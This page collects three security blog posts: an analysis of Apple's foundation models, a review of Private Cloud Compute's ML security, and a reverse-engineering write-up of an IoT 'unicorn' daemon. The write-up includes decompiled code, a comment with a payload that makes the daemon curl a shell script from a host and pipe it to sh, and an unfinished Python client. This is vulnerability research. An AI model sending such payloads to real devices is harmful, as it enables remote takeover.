Normal view

There are new articles available, click to refresh the page.
Yesterday — 15 June 2024Main stream
Before yesterdayMain stream

Understanding Apple’s On-Device and Server Foundation Models release

14 June 2024 at 20:49

By Artem Dinaburg

Earlier this week, at Apple’s WWDC, we finally witnessed Apple’s AI strategy. The videos and live demos were accompanied by two long-form releases: Apple’s Private Cloud Compute and Apple’s On-Device and Server Foundation Models. This blog post is about the latter.

So, what is Apple releasing, and how does it compare to the current open-source ecosystem? We integrate the video and long-form releases and parse through the marketing speak to bring you the nuggets of information within.

The sound of silence

No NVIDIA/CUDA Tax. What’s unsaid is as important as what is, and those words are CUDA and NVIDIA. Apple goes out of its way to specify that it is not dependent on NVIDIA hardware or CUDA APIs for anything. The training uses Apple’s AXLearn (which runs on TPUs and Apple Silicon), Server model inference runs on Apple Silicon (!), and the on-device APIs are CoreML and Metal.

Why? Apple hates NVIDIA with the heat of a thousand suns. Tim Cook would rather sit in a data center and do matrix multiplication with an abacus than spend millions on NVIDIA hardware. Aside from personal enmity, it is a good business idea. Apple has its own ML stack from the hardware on up and is not hobbled by GPU supply shortages. Apple also gets to dogfood its hardware and software for ML tasks, ensuring that it’s something ML developers want.

What’s the downside? Apple’s hardware and software ML engineers must learn new frameworks and may accidentally repeat prior mistakes. For example, Apple devices were originally vulnerable to LeftoverLocals, but NVIDIA devices were not. If anyone from Apple is reading this, we’d love to audit AXLearn, MLX, and anything else you have cooking! Our interests are in the intersection of ML, program analysis, and application security, and your frameworks pique our interest.

The models

There are (at least) five models being released. Let’s count them:

  1. The ~3B parameter on-device model used for language tasks like summarization and Writing Tools.
  2. The large Server model is used for language tasks too complex to do on-device.
  3. The small on-device code model built into XCode used for Swift code completion.
  4. The large Server code model (“Swift Assist”) that is used for complex code generation and understanding tasks.
  5. The diffusion model powering Genmoji and Image Playground.

There may be more; these aren’t explicitly stated but plausible: a re-ranking model for working with Semantic Search and a model for instruction following that will use app intents (although this could just be the normal on-device model).

The ~3B parameter on-device model. Apple devices are getting an approximately 3B parameter on-device language model trained on web crawl and synthetic data and specially tuned for instruction following. The model is similar in size to Microsoft’s Phi-3-mini (3.8B parameters) and Google’s Gemini Nano-2 (3.25B parameters). The on-device model will be continually updated and pushed to devices as Apple trains it with new data.

What model is it? A reasonable guess is a derivative of Apple’s OpenELM. The parameter count fits (3B), the training data is similar, and there is extensive discussion of LoRA and DoRA support in the paper, which only makes sense if you’re planning a system like Apple has deployed. It is almost certainly not directly OpenELM since the vocabulary sizes do not match and OpenELM has not undergone safety tuning.

Apple’s on-device and server model architectures.

A large (we’re guessing 130B-180B) Mixture-of-Experts Server model. For tasks that can’t be completed on a device, there is a large model running on Apple Silicon Servers in their Private Compute Cloud. This model is similar in size and capability to GPT-3.5 and is likely implemented as a Mixture-of-Experts. Why are we so confident about the size and MoE architecture? The open-source comparison models in cited benchmarks (DBRX, Mixtral) are MoE and approximately of that size; it’s too much for a mere coincidence.

Apple’s Server model compared to open source alternatives and the GPT series from OpenAI.

The on-device code model is cited in the platform state of the union; several examples of Github Copilot-like behavior integrated into XCode are shown. There are no specifics about the model, but a reasonable guess would be a 2B-7B code model fine-tuned for a specific task: fill-in-middle for Swift. The model is trained on Swift code and Apple SDKs (likely both code and documentation). From the demo video, the integration into XCode looks well done; XCode gathers local symbols and proper context for the model to better predict the correct text.

Apple’s on-device code model doing FIM completions for Swift code via XCode.

The server code model is branded as “Swift Assist” and also appears in the platform state of the union. It looks to be Apple’s answer to GitHub Copilot Chat. Not much detail is given regarding the model, but looking at its demo output, we guess it’s a 70B+ parameter model specifically trained on Swift Code, SDKs, and documentation. It is probably fine-tuned for instruction following and code generation tasks using human-created and synthetically generated data. Again, there is tight integration with XCode regarding providing relevant context to the model; the video mentions automatically identifying and using image and audio assets present in the project.

Swift Assist completing a description to code generation task, integrated into XCode.

The Image Diffusion Model. This model is discussed in the Platforms State of the Union and implicitly shown via Genmoji and Image Playground features. Apple has considerable published work on image models, more so than language models (compare the amount of each model type on Apple’s HF page). Judging by their architecture slide, there is a base model with a selection of adapters to provide fine-grained control over the exact image style desired.

Image Playground showing the image diffusion model and styling via adapters.

Adapters: LoRAs (and DoRAs) galore

The on-device models will come with a set of LoRAs and/or DoRAs (Adapters, in Apple parlance) that specialize the on-device model to be very good at specific tasks. What’s an adapter? It’s effectively a diff against the original model weights that makes the model good at a specific task (and conversely, worse at general tasks). Since adapters do not have to modify every weight to be effective, they can be small (10s of megabytes) compared to a full model (multiple gigabytes). Adapters can also be dynamically added or removed from a base model, and multiple adapters can stack onto each other (e.g., imagine stacking Mail Replies + Friendly Tone).

For Apple, shipping a base model and adapters makes perfect sense: the extra cost of shipping adapters is low, and due to complete control of the OS and APIs, Apple has an extremely good idea of the actual task you want to accomplish at any given time. Apple promises continued updates of adapters as new training data is available and we imagine new adapters can fill specific action niches as needed.

Some technical details: Apple says their adapters modify multiple layers (likely equivalent to setting target_modules=”all-linear” in HF’s transformers). Adapter rank determines how strong an effect it has against the base model; conversely, higher-rank adapters take up more space since they modify more weights. At rank=16 (which from a vibes/feel standpoint is a reasonable compromise between effect and adapter size), the adapters take up 10s of megabytes each (as compared to gigabytes for a 3B base model) and are kept in some kind of warm cache to optimize for responsiveness.

Suppose you’d like to learn more about adapters (the fundamental technology, not Apple’s specific implementation) right now. In that case, you can try via Apple-native MLX examples or HF’s transformers and PEFT packages.

A selection of Apple’s language model adapters.

A vector database?

Apple doesn’t explicitly state this, but there’s a strong implication that Siri’s semantic search feature is a vector database; there’s an explicit comparison that shows Siri now searches based on meaning instead of keywords. Apple allows application data to be indexed, and the index is multimodal (images, text, video). A local application can provide signals (such as last accessed time) to the ranking model used to sort search results.

Siri now searches by semantic meaning, which may imply there is a vector database underneath.

Delving into technical details

Training and data

Let’s talk about some of the training techniques described. They are all ways to parallelize training very large language models. In essence, these techniques are different means to split & replicate the model to train it using an enormous amount of compute and data. Below is a quick explanation of the techniques used, all of which seem standard for training such large models:

  • Data Parallelism: Each GPU has a copy of the full model but is assigned a chunk of the training data. The gradients from all GPUs are aggregated and used to update weights, which are synchronized across models.
  • Tensor Parallelism: Specific parts of the model are split across multiple GPUs. PyTorch docs say you will need this once you have a big model or GPU communication overhead becomes an issue.
  • Sequence Parallelism was the hardest topic to find; I had to dig to page 6 of this paper. Parts of the transformer can be split to process multiple data items at once.
  • FSDP shards your model across multiple GPUs or even CPUs. Sharding reduces peak GPU memory usage since the whole model does not have to be kept in memory, at the expense of communication overhead to synchronize state. FDSP is supported by PyTorch and is regularly used for finetuning large models.

Surprise! Apple has also crawled the web for training with AppleBot. A raw crawl naturally contains a lot of garbage, sensitive data, and PII, which must be filtered before training. Ensuring data quality is hard work! HuggingFace has a great blog post about what was needed to improve the quality of their web crawl, FineWeb. Apple had to do something similar to filter out their crawl garbage.

Apple also has licensed training data. Who the data partners are is not mentioned. Paying for high-quality data seems to be the new normal, with large tech companies striking deals with big content providers (e.g., StackOverflow, Reddit, NewsCorp).

Apple also uses synthetic data generation, which is also fairly standard practice. However, it begs the question: How does Apple generate the synthetic data? Perhaps the partnership with OpenAI lets them legally launder GPT-4 output. While synthetic data can do wonders, it is not without its downside—there are forgetfulness issues with training on a large synthetic data corpus.

Optimization

This section describes how Apple optimizes its device and server models to be smaller and enable faster inference on devices with limited resources. Many of these optimizations are well known and already present in other software, but it’s great to see this level of detail about what optimizations are applied in production LLMs.

Let’s start with the basics. Apple’s models use GQA (another match with OpenELM). They share vocabulary embedding tables, which implies that some embedding layers are shared between the input and the output to save memory. The on-device model has a 49K token vocabulary (a key difference from OpenELM). The hosted model has a 100K token vocabulary, with special tokens for language and “technical tokens.” The model vocabulary means how many letters and short sequences of words (or tokens) the model recognizes as unique. Some tokens are also used for signaling special states to the model, for instance, the end of the prompt, a request to fill in the middle, a new file being processed, etc. A large vocabulary makes it easier for the model to understand certain concepts and specific tasks. As a comparison, Phi-3 has a vocabulary size of 32K, Llama3 has a vocabulary of 128K tokens, and Qwen2 has a vocabulary of 152K tokens. The downside of a large vocabulary is that it results in more training and inference time overhead.

Quantization & palletization

The models are compressed via palletization and quantization to 3.5 bits-per-weight (BPW) but “achieve the same accuracy as uncompressed models.” What does “achieve the same accuracy” mean? Likely, it refers to an acceptable quantization loss. Below is a graph from a PR to llama.cpp with state-of-the-art quantization losses for different techniques as of February 2024. We are not told what Apple’s acceptable loss is, but it’s doubtful a 3.5 BPW compression will have zero loss versus a 16-bit float base model. Using “same accuracy” seems misleading, but I’d love to be proven wrong. Compression also affects metrics beyond accuracy, so the model’s ability may be degraded in ways not easily captured by benchmarks.

Quantization error compared with bits per weight, from a PR to llama.cpp. The loss at 3.5 BPW is noticeably not zero.

What is Low Bit Palletization? It’s one of Apple’s compression strategies, described in their CoreML documentation. The easiest way to understand it is to use its namesake, image color pallets. An uncompressed image stores the color values of each pixel. A simple optimization is to select some number of colors (say, 16) that are most common to the image. The image can then be encoded as indexes into the color palette and 16 full-color values. Imagine the same technique applied to model weights instead of pixels, and you get palletization. How good is it? Apple publishes some results for the effectiveness of 2-bit and 4-bit palletization. The two-bit palletization looks to provide ~6-7x compression from float16, and 4-bit compression measures out at ~3-4x, with only a slight latency penalty. We can ballpark and assume the 3.5 BPW will compress ~5-6x from the original 16-bit-per-weight model.

Palletization graphic from Apple’s CoreML documentation. Note the similarity to images and color pallets.

Palletization only applies to model weights; when performing inference, a source of substantial memory usage is runtime state. Activations are the outputs of neurons after applying some kind of transformation function, storing these in deep models can take up a considerable amount of memory, and quantizing them is a way to fit a bigger model for inference. What is quantization? It’s a way to map intervals of a large range (like 16 bits) into a smaller range (like 4 or 8 bits). There is a great graphical demonstration in this WWDC 2024 video.

Quantization is also applied to embedding layers. Embeddings map inputs (such as words or images) into a vector that the ML model can utilize. The amount/size of embeddings depends on the vocabulary size, which we saw was 49K tokens for on-device models. Again, quantizing this lets us fit a bigger model into less memory at the cost of accuracy.

How does Apple do quantization? The CoreML docs reveal the algorithms are GPTQ and QAT.

Faster inference

The first optimization is caching previously computed values via the KV Cache. LLMs are next-token predictors; they always generate one token at a time. Repeated recomputation of all prior tokens through the model naturally involves much duplicate effort, which can be saved by caching previous results! That’s what the KV cache does. As a reminder, cache management is one of the two hard problems of computer science. KV caching is a standard technique implemented in HF’s transformers package, llama.cpp, and likely all other open-source inference solutions.

Apple promises a time-to-first-token of 0.6ms per prompt token and an inference speed of 30 tokens per second (before other optimizations like token speculation) on an iPhone 15. How does this compare to current open-source models? Let’s run some quick benchmarks!

On an M3 Max Macbook Pro, phi3-mini-4k quantized as Q4_K (about 4.5 BPW) has a time-to-first-token of about 1ms/prompt token and generates about 75 tokens/second (see below).

Apple’s 40% latency reduction on time-to-first-token on less powerful hardware is a big achievement. For token generation, llama.cpp does ~75 tokens/second, but again, this is on an M3 Max Macbook Pro and not an iPhone 15.

The speed of 30 tokens per second doesn’t provide much of an anchor to most readers; the important part is that it’s much faster than reading speed, so you aren’t sitting around waiting for the model to generate things. But this is just the starting speed. Apple also promises to deploy token speculation, a technique where a slower model guides how to get better output from a larger model. Judging by the comments in the PR that implemented this in llama.cpp, speculation provides 2-3x speedup over normal inference, so real speeds seen by consumers may be closer to 60 tokens per second.

Benchmarks and marketing

There’s a lot of good and bad in Apple’s reported benchmarks. The models are clearly well done, but some of the marketing seems to focus on higher numbers rather than fair comparisons. To start with a positive note, Apple evaluated its models on human preference. This takes a lot of work and money but provides the most useful results.

Now, the bad: a few benchmarks are not exactly apples-to-apples (pun intended). For example, the graph comparing human satisfaction summarization compares Apple’s on-device model + adapter against a base model Phi-3-mini. While the on-device + adapter performance is indeed what a user would see, a fair comparison would have been Apple’s on-device model + adapter vs. Phi-3-mini + a similar adapter. Apple could have easily done this, but they didn’t.

A benchmark comparing an Apple model + adapter to a base Phi-3-mini. A fairer comparison would be against Phi-3-mini + adapter.

The “Human Evaluation of Output Harmfulness” and “Human Preference Evaluation on Safety Prompts” show that Apple is very concerned about the kind of content its model generates. Again, the comparison is not exactly apples-to-apples: Mistral 7B was specifically released without a moderation mechanism (see the note at the bottom). However, the other models are fair game, as Phi-3-mini and Gemma claim extensive model safety procedures.

Mistral-7B does so poorly because it is explicitly not trained for harmfulness reduction, unlike the other competitors, which are fair game.

Another clip from one of the WWDC videos really stuck with us. In it, it is implied that macOS Sequoia delivers large ML performance gains over macOS Sonoma. However, the comparison is really a full-weight float16 model versus a quantized model, and the performance gains are due to quantization.

The small print shows full weights vs. 4-bit quantization, but the big print makes it seem like macOS Sonoma versus macOS Sequoia.

The rest of the benchmarks show impressive results in instruction following, composition, and summarization and are properly done by comparing base models to base models. These benchmarks correspond to high-level tasks like composing app actions to achieve a complex task (instruction following), drafting messages or emails (composition), and quickly identifying important parts of large documents (summarization).

A commitment to on-device processing and vertical integration

Overall, Apple delivered a very impressive keynote from a UI/UX perspective and in terms of features immediately useful to end-users. The technical data release is not complete, but it is quite good for a company as secretive as Apple. Apple also emphasizes that complete vertical integration allows them to use AI to create a better device experience, which helps the end user.

Finally, an important part of Apple’s presentation that we had not touched on until now is its overall commitment to maintaining as much AI on-device as possible and ensuring data privacy in the cloud. This speaks to Apple’s overall position that you are the customer, not the product.

If you enjoyed this synthesis of Apple’s machine learning release, consider what we can do for your machine learning environment! We specialize in difficult, multidisciplinary problems that combine application and ML security. Please contact us to know more.

PCC: Bold step forward, not without flaws

14 June 2024 at 19:46

By Adelin Travers

Earlier this week, Apple announced Private Cloud Compute (or PCC for short). Without deep context on the state of the art of Artificial Intelligence (AI) and Machine Learning (ML) security, some sensible design choices may seem surprising. Conversely, some of the risks linked to this design are hidden in the fine print. In this blog post, we’ll review Apple’s announcement, both good and bad, focusing on the context of AI/ML security. We recommend Matthew Green’s excellent thread on X for a more general security context on this announcement:

https://x.com/matthew_d_green/status/1800291897245835616

Disclaimer: This breakdown is based solely on Apple’s blog post and thus subject to potential misinterpretations of wording. We do not have access to the code yet, but we look forward to Apple’s public PCC Virtual Environment release to examine this further!

Review summary

This design is excellent on the conventional non-ML security side. Apple seems to be doing everything possible to make PCC a secure, privacy-oriented solution. However, the amount of review that security researchers can do will depend on what code is released, and Apple is notoriously secretive.

On the AI/ML side, the key challenges identified are on point. These challenges result from Apple’s desire to provide additional processing power for compute-heavy ML workloads today, which incidentally requires moving away from on-device data processing to the cloud. Homomorphic Encryption (HE) is a big hope in the confidential ML field but doesn’t currently scale. Thus, Apple’s choice to process data in its cloud at scale requires decryption. Moreover, the PCC guarantees vary depending on whether Apple will use a PCC environment for model training or inference. Lastly, because Apple is introducing its own custom AI/ML hardware, implementation flaws that lead to information leakage will likely occur in PCC when these flaws have already been patched in leading AI/ML vendor devices.

Running commentary

We’ll follow the release post’s text in order, section-by-section, as if we were reading and commenting, halting on specific passages.

Introduction


When I first read this post, I’ll admit that I misunderstood this passage as Apple starting an announcement that they had achieved end-to-end encryption in Machine Learning. This would have been even bigger news than the actual announcement.

That’s because Apple would need to use Homomorphic Encryption to achieve full end-to-end encryption in an ML context. HE allows computation of a function, typically an ML model, without decrypting the underlying data. HE has been making steady progress and is a future candidate for confidential ML (see for instance this 2018 paper). However, this would have been a major announcement and shift in the ML security landscape because HE is still considered too slow to be deployed at the cloud scale and in complex functions like ML. More on this later on.

Note that Multi-Party Computation (MPC)—which allows multiple agents, for instance the server and the edge device, to compute different parts of a function like an ML model and aggregate the result privately—would be a distributed scheme on both the server and edge device which is different from what is presented here.

The term “requires unencrypted access” is the key to the PCC design challenges. Apple could continue processing data on-device, but this means abiding by mobile hardware limitations. The complex ML workloads Apple wants to offload, like using Large Language Models (LLM), exceed what is practical for battery-powered mobile devices. Apple wants to move the compute to the cloud to provide these extended capabilities, but HE doesn’t currently scale to that level. Thus to provide these new capabilities of service presently, Apple requires access to unencrypted data.

This being said, Apple’s design for PCC is exceptional, and the effort required to develop this solution was extremely high, going beyond most other cloud AI applications to date.

Thus, the security and privacy of ML models in the cloud is an unsolved and active research domain when an auditor only has access to the model.

A good example of these difficulties can be found in Machine Unlearning—a privacy scheme that allows removing data from a model—that was shown to be impossible to formally prove by just querying a model. Unlearning must thus be proven at the algorithm implementation level.

When the underlying entirely custom and proprietary technical stack of Apple’s PCC is factored in, external audits become significantly more complex. Matthew Green notes that it’s unclear what part of the stack and ML code and binaries Apple will release to audit ML algorithm implementations.

This is also definitely true. Members of the ML Assurance team at Trail of Bits have been releasing attacks that modify the ML software stack at runtime since 2021. Our attacks have exploited the widely used pickle VM for traditional RCE backdoors and malicious custom ML graph operators on Microsoft’s ONNXRuntime. Sleepy Pickles, our most recent attack, uses a runtime attack to dynamically swap an ML model’s weights when the model is loaded.

This is also true; the design later introduced by Apple is far better than many other existing designs.

Designing Private Cloud compute

From an ML perspective, this claim depends on the intended use case for PCC, as it cannot hold true in general. This claim may be true if PCC is only used for model inference. The rest of the PCC post only mentions inference which suggests that PCC is not currently used for training.

However, if PCC is used for training, then data will be retained, and stateless computation that leaves no trace is likely impossible. This is because ML models retain data encoded in their weights as part of their training. This is why the research field of Machine Unlearning introduced above exists.

The big question that Apple needs to answer is thus whether it will use PCC for training models in the future. As others have noted, this is an easy slope to slip into.

Non-targetability is a really interesting design idea that hasn’t been applied to ML before. It also mitigates hardware leakage vulnerabilities, which we will see next.

Introducing Private Cloud Compute nodes

As others have noted, using Secure Enclaves and Secure Boot is excellent since it ensures only legitimate code is run. GPUs will likely continue to play a large role in AI acceleration. Apple has been building its own GPUs for some time, with its M series now in the third generation rather than using Nvidia’s, which are more pervasive in ML.

However, enclaves and attestation will provide only limited guarantees to end-users, as Apple effectively owns the attestation keys. Moreover, enclaves and GPUs have had vulnerabilities and side channels that resulted in exploitable leakage in ML. Apple GPUs have not yet been battle-tested in the AI domain as much as Nvidia’s; thus, these accelerators may have security issues that their Nvidia counterparts do not have. For instance, Apple’s custom hardware was and remains affected by the LeftoverLocals vulnerability when Nvidia’s hardware was not. LeftoverLocals is a GPU hardware vulnerability released by Trail of Bits earlier this year. It allows an attacker collocated with a victim on a vulnerable device to listen to the victim’s LLM output. Apple’s M2 processors are still currently impacted at the time of writing.

This being said, the PCC design’s non-targetability property may help mitigate LeftoverLocals for PCC since it prevents an attacker from identifying and achieving collocation to the victim’s device.

This is important as Swift is a compiled language. Swift is thus not prone to the dynamic runtime attacks that affect languages like Python which are more pervasive in ML. Note that Swift would likely only be used for CPU code. The GPU code would likely be written in Apple’s Metal GPU programming framework. More on dynamic runtime attacks and Metal in the next section.

Stateless computation and enforceable guarantees

Apple’s solution is not end-to-end encrypted but rather an enclave-based solution. Thus, it does not represent an advancement in HE for ML but rather a well-thought-out combination of established technologies. This is, again, impressive, but the data is decrypted on Apple’s server.

As presented in the introduction, using compiled Swift and signed code throughout the stack should prevent attacks on ML software stacks at runtime. Indeed, the ONNXRuntime attack defines a backdoored custom ML primitive operator by loading an adversary-built shared library object, while the Sleepy Pickle attack relies on dynamic features of Python.

Just-in-Time (JIT) compiled code has historically been a steady source of remote code execution vulnerabilities. JIT compilers are notoriously difficult to implement and create new executable code by design, making them a highly desirable attack vector. It may surprise most readers, but JIT is widely used in ML stacks to speed up otherwise slow Python code. JAX, an ML framework that is the basis for Apple’s own AXLearn ML framework, is a particularly prolific user of JIT. Apple avoids the security issues of JIT by not using it. Apple’s ML stack is instead built in Swift, a memory safe ahead-of-time compiled language that does not need JIT for runtime performance.

As we’ve said, the GPU code would likely be written in Metal. Metal does not enforce memory safety. Without memory safety, attacks like LeftoverLocals are possible (with limitations on the attacker, like machine collocation).

No privileged runtime access

This is an interesting approach because it shows Apple is willing to trade off infrastructure monitoring capabilities (and thus potentially reduce PCC’s reliability) for additional security and privacy guarantees. To fully understand the benefits and limits of this solution, ML security researchers would need to know what exact information is captured in the structured logs. A complete analysis thus depends on Apple’s willingness or unwillingness to release the schema and pre-determined fields for these logs.

Interestingly, limiting the type of logs could increase ML model risks by preventing ML teams from collecting adequate information to manage these risks. For instance, the choice of collected logs and metrics may be insufficient for the ML teams to detect distribution drift—when input data no longer matches training data and the model performance decreases. If our understanding is correct, most of the collected metrics will be metrics for SRE purposes, meaning that data drift detection would not be possible. If the collected logs include ML information, accidental data leakage is possible but unlikely.

Non-targetability

This is excellent as lower levels of the ML stack, including the physical layer, are sometimes overlooked in ML threat models.

The term “metadata” is important here. Only the metadata can be filtered away in the manner Apple describes. However, there are virtually no ways of filtering out all PII in the body content sent to the LLM. Any PII in the body content will be processed unencrypted by the LLM. If PCC is used for inference only, this risk is mitigated by structured logging. If PCC is also used for training, which Apple has yet to clarify, we recommend not sharing PII with systems like these when it can be avoided.

It might be possible for an attacker to obtain identifying information in the presence of side channel vulnerabilities, for instance, linked to implementation flaws, that leak some information. However, this is unlikely to happen in practice: the cost placed on the adversary to simultaneously exploit both the load balancer and side channels will be prohibitive for non-nation state threat actors.

An adversary with this level of control should be able to spoof the statistical distribution of nodes unless the auditing and statistical analysis are done at the network level.

Verifiable transparency


This is nice to see! Of course, we do not know if these will need to be analyzed through extensive reverse engineering, which will be difficult, if not impossible, for Apple’s custom ML hardware. It is still a commendable rare occurrence for projects of this scale.

PCC: Security wins, ML questions

Apple’s design is excellent from a security standpoint. Improvements on the ML side are always possible. However, it is important to remember that those improvements are tied to some open research questions, like the scalability of homomorphic encryption. Only future vulnerability research will shed light on whether implementation flaws in hardware and software will impact Apple. Lastly, only time will tell if Apple continuously commits to security and privacy by only using PCC for inference rather than training and implementing homomorphic encryption as soon as it is sufficiently scalable.

Reverse Engineering The Unicorn

14 June 2024 at 16:10

While reversing a device, we stumbled across an interesting binary named unicorn. The binary appeared to be a developer utility potentially related to the Augentix SoC SDK. The unicorn binary is only executed when the device is set to developer mode. Fortunately, this was not the default setting on the device we were analyzing. However, we were interested in the consequences of a device that could have been misconfigured.

Discovering the Binary

While analyzing the firmware, we noticed that different services will start upon boot depending on what mode the device is set to.

...SNIPPET...

rcS() {
	# update system mode if a new one exists
	$MODE -u
	mode=$($MODE)
	echo "Current system mode: $mode"

	# Start all init scripts in /etc/init.d/MODE
	# executing them in numerical order.
	#
	for i in /etc/init.d/$mode/S??* ;do

		# Ignore dangling symlinks (if any).
		[ ! -f "$i" ] && continue
		case "$i" in
		*.sh)
		    # Source shell script for speed.
		    (
			trap - INT QUIT TSTP
			set start
			. $i
		    )
		    ;;
		*)
		    # No sh extension, so fork subprocess.
		    $i start
		    ;;
		esac
	done


...SNIPPET...

If the device boots in factory or developer mode, some additional remote services such as telnetd, sshd, and the unicorn daemon are started. The unicorn daemon listens on port 6666 and attempting to manually interact with the binary didn’t yield any interesting results. So we popped the binary into Ghidra to take a look at what was happening under the hood.

Reverse Engineering the Binary

From the main function we see that if the binary is run with no arguments, it will run as a daemon.

int main(int argc,char **argv)

{
  uint uVar1;
  int iVar2;
  ushort **ppuVar3;
  size_t sVar4;
  char *pcVar5;
  char local_8028 [16];
  
  memset(local_8028,0,0x8000);
  if (argc == 1) {
    openlog("unicorn",1,0x18);
    syslog(5,"unicorn daemon ready to serve!");
                    /* WARNING: Subroutine does not return */
    start_daemon_handle_client_conns();
  }
  while( true ) {
    while( true ) {
      while( true ) {
        iVar2 = getopt(argc,argv,"hsg:c:");
        uVar1 = optopt;
        if (iVar2 == -1) {
          openlog("unicorn",1,0x18);
          syslog(5,"2 unicorn daemon ready to serve!");
                    /* WARNING: Subroutine does not return */
          start_daemon_handle_client_conns();
        }
        if (iVar2 != 0x67) break;
        local_8028[0] = '{';
        local_8028[1] = '\"';
        local_8028[2] = 'm';
        local_8028[3] = 'o';
        local_8028[4] = 'd';
        local_8028[5] = 'u';
        local_8028[6] = 'l';
        local_8028[7] = 'e';
        local_8028[8] = '\"';
        local_8028[9] = ':';
        local_8028[10] = ' ';
        local_8028[11] = '\"';
        pcVar5 = stpcpy(local_8028 + 0xc,optarg);
        memcpy(pcVar5,"\"}",3);
        sVar4 = FUN_00012564(local_8028,0xffffffff);
        if (sVar4 == 0xffffffff) {
          syslog(6,"ccClientGet failed!\n");
        }
      }
      if (0x67 < iVar2) break;
      if (iVar2 == 0x3f) {
        if (optopt == 0x73 || (optopt & 0xfffffffb) == 99) {
          fprintf(stderr,"Option \'-%c\' requires an argument.\n",optopt);
        }
        else {
          ppuVar3 = __ctype_b_loc();
          if (((*ppuVar3)[uVar1] & 0x4000) == 0) {
            pcVar5 = "Unknown option character \'\\x%x.\n";
          }
          else {
            pcVar5 = "Unknown option \'-%c\'.\n";
          }
          fprintf(stderr,pcVar5,uVar1);
        }
        return 1;
      }
      if (iVar2 != 99) goto LAB_0000bb7c;
      sprintf(&DAT_0008c4c4,optarg);
    }
    if (iVar2 == 0x68) {
      USAGE();
                    /* WARNING: Subroutine does not return */
      exit(1);
    }
    if (iVar2 != 0x73) break;
    DAT_0008d410 = 1;
  }
LAB_0000bb7c:
  puts("aborting...");
                    /* WARNING: Subroutine does not return */
  abort();
}

If the argument passed is -h (0x68), then it calls the usage function:

void USAGE(void)

{
  puts("Usage:");
  puts("\t To run unicorn as daemon, do not use any args.");
  puts("\t\'-g get \'\t get product setting. D:img_pref");
  puts("\t\'-s set \'\t set product setting. D:img_pref");
  putchar(10);
  puts("\tSample usage");
  puts("\t$ unicorn -g img_pref");
  return;
}

When no arguments are passed, a function is called that sets up and handles client connections, which can be seen above renamed as start_daemon_handle_client_conns();. Most of the code in the start_daemon_handle_client_conns() function is handling and setting up client connections. There is a small portion of the code that performs an initial check of the data received to see if it matches a specific string AgtxCrossPlatCommn.

                  else {
                    ptr_result = strstr(DATA_FROM_CLIENT,"AgtxCrossPlatCommn");
                    syslog(6,"%s(): \'%s\'\n","interpretData",DATA_FROM_CLIENT);
                    if (ptr_result == (char *)0x0) {
                      syslog(6,"Invalid command \'%s\' received! Closing client fd %d\n",0,__fd_00);
                      goto LAB_0000e02c;
                    }
                    if ((DATA_FROM_CLIENT_PLUS1[command_length] != '@') ||
                       (client_command_buffer = (byte *)(ptr_result + 0x12),
                       client_command_buffer == (byte *)0x0)) goto LAB_0000e02c;
                    if (IS_SSL_ENABLED != 1) {
                      syslog(6,"Handle action for client %2d, fdmax = %d ...\n",__fd_00,uVar12);
                      command_length =
                           handle_client_cmd(client_command_buffer,client_info,command_length);
                      if (command_length != 0) {
                        send_response_to_client
                                  ((int)*client_info,apSStack_8520 + uVar9 * 5 + 2,command_length);
                      }
                      goto LAB_0000e02c;
                    }

The AgtxCrossPlatCommn portion of the code checks whether or not the data received ends with an @ character or if the data following AgtxCrossPlatCommn string is NULL. If the data doesn’t end with an @ character or the data following the key string is NULL it branches off. If these checks pass, the data is then sent to another function which handles the processing of the commands from the client. At this point we know that the binary expects to receive data in the format AgtxCrossPlatCommn<DATA>@. The handle_client_cmd function is where the fun happens. The beginning of the function handles some additional processing of the data received.

  if (client_command_buffer == (byte *)0x0) {
    syslog(6,"Invalid action: sig is NULL \n");
    return -3;
  }
  ACTION_NUM = get_Action_NUM(client_command_buffer);
  client_command = get_cmd_data(client_command_buffer,command_length);
  operation_result = ACTION_NUM;
  iVar1 = command_length;
  ptr_to_cmd = client_command;
  syslog(6,"%s(): action %d, nbytes %d, params %s\n","handleAction",ACTION_NUM,command_length,
         client_command);
  memset(system_command_buffer,0,0x100);
  switch(ACTION_NUM) {
  case 0:

The binary is expecting the data received to contain a number, which is parsed out and passed to a switch() statement to determine which action needs to be executed. There are a total of 15 actions which perform various tasks such as read files, write files, execute arbitrary commands (some intentional, others not), along with others whose purpose wasn’t not inherently clear. The first action number which caught our eye was 14 (0xe) as it appeared to directly allow us to run commands.

  case 0xe:
/* execute commands here
AgtxCrossPlatCommn14 sh -c 'curl 192.168.55.1/shell.sh | sh'@ */

    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    syslog(6,"ACT_cmd: |%s| \n",client_command);
    command_params = strstr(client_command,"rm ");
    if (command_params == (char *)0x0) {
      command_params = strstr(client_command,"audioctrl");
      if (((((((command_params != (char *)0x0) ||
              (command_params = strstr(client_command,"light_test"), command_params != (char *)0x0))
             || (command_params = strstr(client_command,"ir_cut.sh"), command_params != (char *)0x0)
             ) || ((command_params = strstr(client_command,"led.sh"), command_params != (char *)0x0
                   || (command_params = strstr(client_command,"sh"), command_params != (char *)0x0))
                  )) ||
           ((command_params = strstr(client_command,"touch"), command_params != (char *)0x0 ||
            ((command_params = strstr(client_command,"echo"), command_params != (char *)0x0 ||
             (command_params = strstr(client_command,"find"), command_params != (char *)0x0)))))) ||
          (command_params = strstr(client_command,"iwconfig"), command_params != (char *)0x0)) ||
         (((((command_params = strstr(client_command,"ifconfig"), command_params != (char *)0x0 ||
             (command_params = strstr(client_command,"killall"), command_params != (char *)0x0)) ||
            (command_params = strstr(client_command,"reboot"), command_params != (char *)0x0)) ||
           (((command_params = strstr(client_command,"mode"), command_params != (char *)0x0 ||
             (command_params = strstr(client_command,"gpio_utils"), command_params != (char *)0x0))
            || ((command_params = strstr(client_command,"bp_utils"), command_params != (char *)0x0
                || ((command_params = strstr(client_command,"sync"), command_params != (char *)0x0
                    || (command_params = strstr(client_command,"chmod"),
                       command_params != (char *)0x0)))))))) ||
          ((command_params = strstr(client_command,"dos2unix"), command_params != (char *)0x0 ||
           (command_params = strstr(client_command,"mkdir"), command_params != (char *)0x0)))))) {
        syslog(6,"Command code: %d\n");
        system_command_status = run_system_cmd(client_command);
        goto LAB_0000b458;
      }
      system_command_result = -1;
    }
    else {
      system_command_result = -2;
    }
    syslog(3,"Invaild command code: %d\n",system_command_result);
    system_command_status = -1;
LAB_0000b458:
    send_response_to_client((int)*client_info,(SSL **)(client_info + 4),system_command_status);
    break;

To test, we manually started the unicorn binary and attempted to issue an ifconfig command with the payload AgtxCrossPlatCommn14ifconfig@ and the following python script:

import socket

HOST = "192.168.55.128" 
PORT = 6666  

